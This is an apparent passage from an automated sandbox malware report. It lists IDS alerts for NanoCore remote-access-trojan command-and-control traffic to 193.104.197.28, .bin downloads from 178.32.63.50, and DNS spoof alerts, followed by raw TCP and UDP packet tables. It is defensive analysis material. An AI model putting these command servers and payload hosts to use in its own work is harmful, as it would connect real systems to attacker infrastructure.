            09/27/21-13:09:20.632692TCP2025019ET TROJAN Possible NanoCore C2 60B4972055642192.168.11.20193.104.197.28
            09/27/21-13:09:26.657562TCP2025019ET TROJAN Possible NanoCore C2 60B4972155642192.168.11.20193.104.197.28
            09/27/21-13:09:27.711494TCP2025019ET TROJAN Possible NanoCore C2 60B4972155642192.168.11.20193.104.197.28
            09/27/21-13:09:32.745478UDP254DNS SPOOF query response with TTL of 1 min. and no authority53548878.8.8.8192.168.11.20
            09/27/21-13:09:32.815581TCP2025019ET TROJAN Possible NanoCore C2 60B4972355642192.168.11.20193.104.197.28
            09/27/21-13:09:38.845324UDP254DNS SPOOF query response with TTL of 1 min. and no authority53652418.8.8.8192.168.11.20
            09/27/21-13:09:39.092870TCP2025019ET TROJAN Possible NanoCore C2 60B4972555642192.168.11.20193.104.197.28
            09/27/21-13:09:39.752123TCP2025019ET TROJAN Possible NanoCore C2 60B4972555642192.168.11.20193.104.197.28
            09/27/21-13:09:45.048056UDP254DNS SPOOF query response with TTL of 1 min. and no authority53533118.8.8.8192.168.11.20
            09/27/21-13:09:45.102937TCP2025019ET TROJAN Possible NanoCore C2 60B4973255642192.168.11.20193.104.197.28
            09/27/21-13:09:51.442730UDP254DNS SPOOF query response with TTL of 1 min. and no authority53574138.8.8.8192.168.11.20
            09/27/21-13:09:51.506118TCP2025019ET TROJAN Possible NanoCore C2 60B4974155642192.168.11.20193.104.197.28
            09/27/21-13:09:57.956848UDP254DNS SPOOF query response with TTL of 1 min. and no authority53631848.8.8.8192.168.11.20
            09/27/21-13:09:58.063495TCP2025019ET TROJAN Possible NanoCore C2 60B4974255642192.168.11.20193.104.197.28
            09/27/21-13:10:04.136420UDP254DNS SPOOF query response with TTL of 1 min. and no authority53512748.8.8.8192.168.11.20
            09/27/21-13:10:04.316852TCP2025019ET TROJAN Possible NanoCore C2 60B4974355642192.168.11.20193.104.197.28
            09/27/21-13:10:10.780607TCP2025019ET TROJAN Possible NanoCore C2 60B4974555642192.168.11.20193.104.197.28
            09/27/21-13:10:11.501891TCP2025019ET TROJAN Possible NanoCore C2 60B4974555642192.168.11.20193.104.197.28
            09/27/21-13:10:16.877063TCP2025019ET TROJAN Possible NanoCore C2 60B4974655642192.168.11.20193.104.197.28
            09/27/21-13:10:17.488699TCP2025019ET TROJAN Possible NanoCore C2 60B4974655642192.168.11.20193.104.197.28
            09/27/21-13:10:20.326961TCP2018752ET TROJAN Generic .bin download from Dotted Quad4974780192.168.11.20178.32.63.50
            09/27/21-13:10:22.716764TCP2025019ET TROJAN Possible NanoCore C2 60B4974855642192.168.11.20193.104.197.28
            09/27/21-13:10:27.439887TCP2018752ET TROJAN Generic .bin download from Dotted Quad4974980192.168.11.20178.32.63.50
            09/27/21-13:10:28.680429UDP254DNS SPOOF query response with TTL of 1 min. and no authority53539168.8.8.8192.168.11.20
            09/27/21-13:10:28.738444TCP2025019ET TROJAN Possible NanoCore C2 60B4975055642192.168.11.20193.104.197.28
            09/27/21-13:10:34.594470TCP2025019ET TROJAN Possible NanoCore C2 60B4975155642192.168.11.20193.104.197.28
            09/27/21-13:10:40.538957UDP254DNS SPOOF query response with TTL of 1 min. and no authority53610428.8.8.8192.168.11.20
            09/27/21-13:10:40.598787TCP2025019ET TROJAN Possible NanoCore C2 60B4975455642192.168.11.20193.104.197.28
            09/27/21-13:10:46.508482TCP2025019ET TROJAN Possible NanoCore C2 60B4975655642192.168.11.20193.104.197.28
            09/27/21-13:10:52.506231UDP254DNS SPOOF query response with TTL of 1 min. and no authority53648508.8.8.8192.168.11.20
            09/27/21-13:10:52.557251TCP2025019ET TROJAN Possible NanoCore C2 60B4975755642192.168.11.20193.104.197.28
            09/27/21-13:10:58.467458TCP2025019ET TROJAN Possible NanoCore C2 60B4975855642192.168.11.20193.104.197.28
            09/27/21-13:11:04.357708UDP254DNS SPOOF query response with TTL of 1 min. and no authority53600828.8.8.8192.168.11.20
            09/27/21-13:11:04.411157TCP2025019ET TROJAN Possible NanoCore C2 60B4975955642192.168.11.20193.104.197.28
            09/27/21-13:11:10.442099UDP254DNS SPOOF query response with TTL of 1 min. and no authority53644988.8.8.8192.168.11.20
            09/27/21-13:11:10.498041TCP2025019ET TROJAN Possible NanoCore C2 60B4976155642192.168.11.20193.104.197.28
            09/27/21-13:11:16.403731UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499558.8.8.8192.168.11.20
            09/27/21-13:11:16.458739TCP2025019ET TROJAN Possible NanoCore C2 60B4976255642192.168.11.20193.104.197.28
            09/27/21-13:11:22.366648TCP2025019ET TROJAN Possible NanoCore C2 60B4976355642192.168.11.20193.104.197.28
            09/27/21-13:11:28.296580TCP2025019ET TROJAN Possible NanoCore C2 60B4976455642192.168.11.20193.104.197.28
            09/27/21-13:11:34.236771TCP2025019ET TROJAN Possible NanoCore C2 60B4976555642192.168.11.20193.104.197.28
            09/27/21-13:11:40.100679TCP2025019ET TROJAN Possible NanoCore C2 60B4976755642192.168.11.20193.104.197.28
            09/27/21-13:11:46.017296TCP2025019ET TROJAN Possible NanoCore C2 60B4976855642192.168.11.20193.104.197.28
            09/27/21-13:11:51.939726UDP254DNS SPOOF query response with TTL of 1 min. and no authority53623908.8.8.8192.168.11.20
            09/27/21-13:11:51.992859TCP2025019ET TROJAN Possible NanoCore C2 60B4976955642192.168.11.20193.104.197.28
            09/27/21-13:11:58.005122UDP254DNS SPOOF query response with TTL of 1 min. and no authority53595998.8.8.8192.168.11.20
            09/27/21-13:11:58.064243TCP2025019ET TROJAN Possible NanoCore C2 60B4977055642192.168.11.20193.104.197.28
            09/27/21-13:12:03.925404TCP2025019ET TROJAN Possible NanoCore C2 60B4977155642192.168.11.20193.104.197.28
            09/27/21-13:12:09.887579UDP254DNS SPOOF query response with TTL of 1 min. and no authority53542088.8.8.8192.168.11.20
            09/27/21-13:12:09.938415TCP2025019ET TROJAN Possible NanoCore C2 60B4977355642192.168.11.20193.104.197.28
            09/27/21-13:12:15.935296UDP254DNS SPOOF query response with TTL of 1 min. and no authority53514428.8.8.8192.168.11.20
            09/27/21-13:12:15.986530TCP2025019ET TROJAN Possible NanoCore C2 60B4977455642192.168.11.20193.104.197.28
            09/27/21-13:12:21.934163UDP254DNS SPOOF query response with TTL of 1 min. and no authority53508768.8.8.8192.168.11.20
            09/27/21-13:12:21.987363TCP2025019ET TROJAN Possible NanoCore C2 60B4977555642192.168.11.20193.104.197.28
            09/27/21-13:12:27.889334TCP2025019ET TROJAN Possible NanoCore C2 60B4977655642192.168.11.20193.104.197.28
            09/27/21-13:12:33.809348TCP2025019ET TROJAN Possible NanoCore C2 60B4977755642192.168.11.20193.104.197.28
            09/27/21-13:12:39.710178UDP254DNS SPOOF query response with TTL of 1 min. and no authority53624658.8.8.8192.168.11.20
            09/27/21-13:12:39.771278TCP2025019ET TROJAN Possible NanoCore C2 60B4977955642192.168.11.20193.104.197.28
            09/27/21-13:12:45.705187TCP2025019ET TROJAN Possible NanoCore C2 60B4978055642192.168.11.20193.104.197.28
            09/27/21-13:12:51.646436TCP2025019ET TROJAN Possible NanoCore C2 60B4978155642192.168.11.20193.104.197.28
            09/27/21-13:12:57.556032TCP2025019ET TROJAN Possible NanoCore C2 60B4978255642192.168.11.20193.104.197.28
            09/27/21-13:13:03.509614UDP254DNS SPOOF query response with TTL of 1 min. and no authority53595148.8.8.8192.168.11.20
            09/27/21-13:13:03.561285TCP2025019ET TROJAN Possible NanoCore C2 60B4978355642192.168.11.20193.104.197.28
            09/27/21-13:13:09.509421UDP254DNS SPOOF query response with TTL of 1 min. and no authority53612548.8.8.8192.168.11.20
            09/27/21-13:13:09.565725TCP2025019ET TROJAN Possible NanoCore C2 60B4978555642192.168.11.20193.104.197.28
            09/27/21-13:13:15.491085UDP254DNS SPOOF query response with TTL of 1 min. and no authority53623288.8.8.8192.168.11.20
            09/27/21-13:13:15.543855TCP2025019ET TROJAN Possible NanoCore C2 60B4978655642192.168.11.20193.104.197.28
            09/27/21-13:13:21.498322UDP254DNS SPOOF query response with TTL of 1 min. and no authority53646178.8.8.8192.168.11.20
            09/27/21-13:13:21.557457TCP2025019ET TROJAN Possible NanoCore C2 60B4978755642192.168.11.20193.104.197.28
            09/27/21-13:13:27.471137TCP2025019ET TROJAN Possible NanoCore C2 60B4978855642192.168.11.20193.104.197.28
            09/27/21-13:13:33.363489TCP2025019ET TROJAN Possible NanoCore C2 60B4978955642192.168.11.20193.104.197.28
            09/27/21-13:13:39.339881UDP254DNS SPOOF query response with TTL of 1 min. and no authority53608028.8.8.8192.168.11.20
            09/27/21-13:13:39.395505TCP2025019ET TROJAN Possible NanoCore C2 60B4979155642192.168.11.20193.104.197.28
            09/27/21-13:13:45.338636UDP254DNS SPOOF query response with TTL of 1 min. and no authority53552218.8.8.8192.168.11.20
            09/27/21-13:13:45.389504TCP2025019ET TROJAN Possible NanoCore C2 60B4979255642192.168.11.20193.104.197.28
            09/27/21-13:13:51.347380TCP2025019ET TROJAN Possible NanoCore C2 60B4979355642192.168.11.20193.104.197.28
            09/27/21-13:13:57.260987TCP2025019ET TROJAN Possible NanoCore C2 60B4979455642192.168.11.20193.104.197.28
            09/27/21-13:14:03.134235TCP2025019ET TROJAN Possible NanoCore C2 60B4979555642192.168.11.20193.104.197.28
            09/27/21-13:14:09.067140UDP254DNS SPOOF query response with TTL of 1 min. and no authority53590858.8.8.8192.168.11.20
            09/27/21-13:14:09.118619TCP2025019ET TROJAN Possible NanoCore C2 60B4979755642192.168.11.20193.104.197.28
            09/27/21-13:14:15.088684UDP254DNS SPOOF query response with TTL of 1 min. and no authority53637008.8.8.8192.168.11.20
            09/27/21-13:14:15.139227TCP2025019ET TROJAN Possible NanoCore C2 60B4979855642192.168.11.20193.104.197.28
            09/27/21-13:14:21.057376TCP2025019ET TROJAN Possible NanoCore C2 60B4979955642192.168.11.20193.104.197.28
            09/27/21-13:14:26.956240TCP2025019ET TROJAN Possible NanoCore C2 60B4980055642192.168.11.20193.104.197.28
            09/27/21-13:14:32.936021UDP254DNS SPOOF query response with TTL of 1 min. and no authority53502398.8.8.8192.168.11.20
            09/27/21-13:14:32.991193TCP2025019ET TROJAN Possible NanoCore C2 60B4980155642192.168.11.20193.104.197.28
            09/27/21-13:14:38.955168UDP254DNS SPOOF query response with TTL of 1 min. and no authority53617118.8.8.8192.168.11.20
            09/27/21-13:14:39.015547TCP2025019ET TROJAN Possible NanoCore C2 60B4980355642192.168.11.20193.104.197.28
            09/27/21-13:14:44.898052TCP2025019ET TROJAN Possible NanoCore C2 60B4980455642192.168.11.20193.104.197.28
            09/27/21-13:14:50.839840UDP254DNS SPOOF query response with TTL of 1 min. and no authority53618948.8.8.8192.168.11.20
            09/27/21-13:14:50.892904TCP2025019ET TROJAN Possible NanoCore C2 60B4980555642192.168.11.20193.104.197.28
            09/27/21-13:14:56.818671TCP2025019ET TROJAN Possible NanoCore C2 60B4980655642192.168.11.20193.104.197.28
            09/27/21-13:15:02.698050TCP2025019ET TROJAN Possible NanoCore C2 60B4980755642192.168.11.20193.104.197.28
            09/27/21-13:15:08.628988TCP2025019ET TROJAN Possible NanoCore C2 60B4980955642192.168.11.20193.104.197.28
            09/27/21-13:15:14.527295TCP2025019ET TROJAN Possible NanoCore C2 60B4981055642192.168.11.20193.104.197.28
            09/27/21-13:15:20.458604UDP254DNS SPOOF query response with TTL of 1 min. and no authority53655098.8.8.8192.168.11.20
            09/27/21-13:15:20.512087TCP2025019ET TROJAN Possible NanoCore C2 60B4981155642192.168.11.20193.104.197.28
            09/27/21-13:15:26.442530TCP2025019ET TROJAN Possible NanoCore C2 60B4981255642192.168.11.20193.104.197.28
            09/27/21-13:15:32.343749TCP2025019ET TROJAN Possible NanoCore C2 60B4981355642192.168.11.20193.104.197.28
            09/27/21-13:15:38.328910UDP254DNS SPOOF query response with TTL of 1 min. and no authority53612128.8.8.8192.168.11.20
            09/27/21-13:15:38.389122TCP2025019ET TROJAN Possible NanoCore C2 60B4981555642192.168.11.20193.104.197.28
            09/27/21-13:15:44.284047TCP2025019ET TROJAN Possible NanoCore C2 60B4981855642192.168.11.20193.104.197.28
            09/27/21-13:15:50.210159TCP2025019ET TROJAN Possible NanoCore C2 60B4981955642192.168.11.20193.104.197.28
            09/27/21-13:15:51.307318TCP2025019ET TROJAN Possible NanoCore C2 60B4981955642192.168.11.20193.104.197.28
            09/27/21-13:15:56.152004UDP254DNS SPOOF query response with TTL of 1 min. and no authority53647168.8.8.8192.168.11.20
            09/27/21-13:15:56.207871TCP2025019ET TROJAN Possible NanoCore C2 60B4982055642192.168.11.20193.104.197.28
            09/27/21-13:16:02.142215TCP2025019ET TROJAN Possible NanoCore C2 60B4982155642192.168.11.20193.104.197.28
            09/27/21-13:16:08.058150UDP254DNS SPOOF query response with TTL of 1 min. and no authority53569658.8.8.8192.168.11.20
            09/27/21-13:16:08.112166TCP2025019ET TROJAN Possible NanoCore C2 60B4982355642192.168.11.20193.104.197.28
            09/27/21-13:16:14.085481UDP254DNS SPOOF query response with TTL of 1 min. and no authority53540648.8.8.8192.168.11.20
            09/27/21-13:16:14.136461TCP2025019ET TROJAN Possible NanoCore C2 60B4982455642192.168.11.20193.104.197.28
            09/27/21-13:16:20.038279TCP2025019ET TROJAN Possible NanoCore C2 60B4982555642192.168.11.20193.104.197.28
            09/27/21-13:16:25.958166UDP254DNS SPOOF query response with TTL of 1 min. and no authority53582068.8.8.8192.168.11.20
            09/27/21-13:16:26.010605TCP2025019ET TROJAN Possible NanoCore C2 60B4982655642192.168.11.20193.104.197.28
            09/27/21-13:16:31.948645TCP2025019ET TROJAN Possible NanoCore C2 60B4982755642192.168.11.20193.104.197.28
            09/27/21-13:16:37.894720TCP2025019ET TROJAN Possible NanoCore C2 60B4982955642192.168.11.20193.104.197.28
            09/27/21-13:16:43.832395UDP254DNS SPOOF query response with TTL of 1 min. and no authority53634988.8.8.8192.168.11.20
            09/27/21-13:16:43.883354TCP2025019ET TROJAN Possible NanoCore C2 60B4983055642192.168.11.20193.104.197.28
            09/27/21-13:16:49.831876TCP2025019ET TROJAN Possible NanoCore C2 60B4983155642192.168.11.20193.104.197.28
            09/27/21-13:16:55.781587TCP2025019ET TROJAN Possible NanoCore C2 60B4983255642192.168.11.20193.104.197.28

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 27, 2021 13:09:17.973654985 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:17.991067886 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:17.991260052 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:17.991836071 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.009867907 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.010015965 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.010029078 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.010040045 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.010114908 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.010263920 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.010354042 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.027554035 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.027647972 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.027728081 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.027772903 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.027815104 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.027823925 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.027894974 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.027952909 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.027968884 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.027993917 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.028045893 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.028120041 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.028122902 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.028163910 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.028290033 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.028328896 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.045531034 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.045641899 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.045696974 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.045739889 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.045743942 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.045783043 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.045818090 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.045871019 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.045994043 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046010017 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046050072 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046050072 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046097994 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046144962 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046195984 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046202898 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046233892 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046246052 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046258926 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046322107 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046372890 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046372890 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046411991 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046420097 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046467066 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046519995 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.046542883 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046581030 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046591043 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046598911 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046731949 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.046771049 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.063633919 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.063693047 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.063846111 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.063862085 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.063874960 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.063903093 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.063951015 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064007044 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064040899 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064071894 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064078093 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064101934 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064105034 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064132929 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064218998 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064244032 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064250946 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064258099 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064269066 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064276934 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064292908 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064357042 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064393044 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064419031 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064435005 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064449072 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064471006 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064505100 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064513922 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064521074 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064548016 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064562082 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064568996 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064610004 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064647913 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064678907 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064702034 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064723015 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064754009 CEST8049719178.32.63.50192.168.11.20
            Sep 27, 2021 13:09:18.064783096 CEST4971980192.168.11.20178.32.63.50
            Sep 27, 2021 13:09:18.064784050 CEST8049719178.32.63.50192.168.11.20

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 27, 2021 13:08:27.091062069 CEST6098653192.168.11.201.1.1.1
            Sep 27, 2021 13:08:27.100529909 CEST53609861.1.1.1192.168.11.20
            Sep 27, 2021 13:08:27.173274994 CEST6549353192.168.11.201.1.1.1
            Sep 27, 2021 13:08:27.182275057 CEST53654931.1.1.1192.168.11.20
            Sep 27, 2021 13:08:29.012609959 CEST6149853192.168.11.201.1.1.1
            Sep 27, 2021 13:08:29.021394014 CEST53614981.1.1.1192.168.11.20
            Sep 27, 2021 13:08:29.187524080 CEST5936453192.168.11.201.1.1.1
            Sep 27, 2021 13:08:29.195957899 CEST53593641.1.1.1192.168.11.20
            Sep 27, 2021 13:08:29.723155975 CEST5975853192.168.11.201.1.1.1
            Sep 27, 2021 13:08:29.732111931 CEST53597581.1.1.1192.168.11.20
            Sep 27, 2021 13:08:30.408044100 CEST5438553192.168.11.201.1.1.1
            Sep 27, 2021 13:08:30.417561054 CEST53543851.1.1.1192.168.11.20
            Sep 27, 2021 13:08:30.698137045 CEST5028853192.168.11.201.1.1.1
            Sep 27, 2021 13:08:30.706433058 CEST53502881.1.1.1192.168.11.20
            Sep 27, 2021 13:08:37.399975061 CEST5936853192.168.11.201.1.1.1
            Sep 27, 2021 13:08:37.408729076 CEST53593681.1.1.1192.168.11.20
            Sep 27, 2021 13:08:39.195426941 CEST5864653192.168.11.201.1.1.1
            Sep 27, 2021 13:08:39.203705072 CEST53586461.1.1.1192.168.11.20
            Sep 27, 2021 13:08:39.849469900 CEST5870453192.168.11.201.1.1.1
            Sep 27, 2021 13:08:39.857958078 CEST53587041.1.1.1192.168.11.20
            Sep 27, 2021 13:08:41.455313921 CEST5600753192.168.11.201.1.1.1
            Sep 27, 2021 13:08:41.463939905 CEST53560071.1.1.1192.168.11.20
            Sep 27, 2021 13:08:41.480340004 CEST5790153192.168.11.201.1.1.1
            Sep 27, 2021 13:08:41.488729000 CEST53579011.1.1.1192.168.11.20
            Sep 27, 2021 13:08:42.031909943 CEST5226453192.168.11.201.1.1.1
            Sep 27, 2021 13:08:42.041203022 CEST53522641.1.1.1192.168.11.20
            Sep 27, 2021 13:09:20.034782887 CEST6274053192.168.11.208.8.8.8
            Sep 27, 2021 13:09:20.137820005 CEST53627408.8.8.8192.168.11.20
            Sep 27, 2021 13:09:26.591469049 CEST4988653192.168.11.208.8.8.8
            Sep 27, 2021 13:09:26.601703882 CEST53498868.8.8.8192.168.11.20
            Sep 27, 2021 13:09:32.638530016 CEST5488753192.168.11.208.8.8.8
            Sep 27, 2021 13:09:32.745477915 CEST53548878.8.8.8192.168.11.20
            Sep 27, 2021 13:09:38.740026951 CEST6524153192.168.11.208.8.8.8
            Sep 27, 2021 13:09:38.845324039 CEST53652418.8.8.8192.168.11.20
            Sep 27, 2021 13:09:40.432487965 CEST5465453192.168.11.201.1.1.1
            Sep 27, 2021 13:09:40.440452099 CEST53546541.1.1.1192.168.11.20
            Sep 27, 2021 13:09:40.909178972 CEST5815353192.168.11.201.1.1.1
            Sep 27, 2021 13:09:40.917840004 CEST53581531.1.1.1192.168.11.20
            Sep 27, 2021 13:09:41.074292898 CEST6264953192.168.11.201.1.1.1
            Sep 27, 2021 13:09:41.082817078 CEST53626491.1.1.1192.168.11.20
            Sep 27, 2021 13:09:42.688306093 CEST4996153192.168.11.201.1.1.1
            Sep 27, 2021 13:09:42.697983980 CEST53499611.1.1.1192.168.11.20
            Sep 27, 2021 13:09:44.941082001 CEST5331153192.168.11.208.8.8.8
            Sep 27, 2021 13:09:45.048055887 CEST53533118.8.8.8192.168.11.20
            Sep 27, 2021 13:09:51.339694977 CEST5741353192.168.11.208.8.8.8
            Sep 27, 2021 13:09:51.442729950 CEST53574138.8.8.8192.168.11.20
            Sep 27, 2021 13:09:57.851999998 CEST6318453192.168.11.208.8.8.8
            Sep 27, 2021 13:09:57.956847906 CEST53631848.8.8.8192.168.11.20
            Sep 27, 2021 13:10:04.031630039 CEST5127453192.168.11.208.8.8.8
            Sep 27, 2021 13:10:04.136420012 CEST53512748.8.8.8192.168.11.20
            Sep 27, 2021 13:10:10.683502913 CEST5299553192.168.11.208.8.8.8
            Sep 27, 2021 13:10:10.693938017 CEST53529958.8.8.8192.168.11.20
            Sep 27, 2021 13:10:16.814394951 CEST5626153192.168.11.208.8.8.8
            Sep 27, 2021 13:10:16.825088024 CEST53562618.8.8.8192.168.11.20
            Sep 27, 2021 13:10:22.655458927 CEST5154053192.168.11.208.8.8.8
            Sep 27, 2021 13:10:22.665482998 CEST53515408.8.8.8192.168.11.20
            Sep 27, 2021 13:10:28.574254990 CEST5391653192.168.11.208.8.8.8
            Sep 27, 2021 13:10:28.680428982 CEST53539168.8.8.8192.168.11.20
            Sep 27, 2021 13:10:34.532900095 CEST6504753192.168.11.208.8.8.8
            Sep 27, 2021 13:10:34.543570995 CEST53650478.8.8.8192.168.11.20
            Sep 27, 2021 13:10:39.772082090 CEST5967653192.168.11.201.1.1.1
            Sep 27, 2021 13:10:39.781001091 CEST53596761.1.1.1192.168.11.20
            Sep 27, 2021 13:10:40.433029890 CEST6104253192.168.11.208.8.8.8
            Sep 27, 2021 13:10:40.538957119 CEST53610428.8.8.8192.168.11.20
            Sep 27, 2021 13:10:43.981724977 CEST5639453192.168.11.201.1.1.1
            Sep 27, 2021 13:10:43.990292072 CEST53563941.1.1.1192.168.11.20
            Sep 27, 2021 13:10:46.444910049 CEST5380353192.168.11.208.8.8.8
            Sep 27, 2021 13:10:46.455328941 CEST53538038.8.8.8192.168.11.20
            Sep 27, 2021 13:10:52.400047064 CEST6485053192.168.11.208.8.8.8
            Sep 27, 2021 13:10:52.506231070 CEST53648508.8.8.8192.168.11.20
            Sep 27, 2021 13:10:58.393814087 CEST5836153192.168.11.208.8.8.8
            Sep 27, 2021 13:10:58.404175997 CEST53583618.8.8.8192.168.11.20
            Sep 27, 2021 13:11:04.252420902 CEST6008253192.168.11.208.8.8.8
            Sep 27, 2021 13:11:04.357707977 CEST53600828.8.8.8192.168.11.20
            Sep 27, 2021 13:11:10.336045027 CEST6449853192.168.11.208.8.8.8
            Sep 27, 2021 13:11:10.442099094 CEST53644988.8.8.8192.168.11.20
            Sep 27, 2021 13:11:16.297339916 CEST4995553192.168.11.208.8.8.8
            Sep 27, 2021 13:11:16.403731108 CEST53499558.8.8.8192.168.11.20
            Sep 27, 2021 13:11:22.301470041 CEST5176253192.168.11.208.8.8.8
            Sep 27, 2021 13:11:22.310287952 CEST53517628.8.8.8192.168.11.20
            Sep 27, 2021 13:11:28.237009048 CEST5376753192.168.11.208.8.8.8
            Sep 27, 2021 13:11:28.245814085 CEST53537678.8.8.8192.168.11.20
            Sep 27, 2021 13:11:34.174585104 CEST5709553192.168.11.208.8.8.8
            Sep 27, 2021 13:11:34.183361053 CEST53570958.8.8.8192.168.11.20
            Sep 27, 2021 13:11:40.040515900 CEST6084853192.168.11.208.8.8.8
            Sep 27, 2021 13:11:40.048793077 CEST53608488.8.8.8192.168.11.20
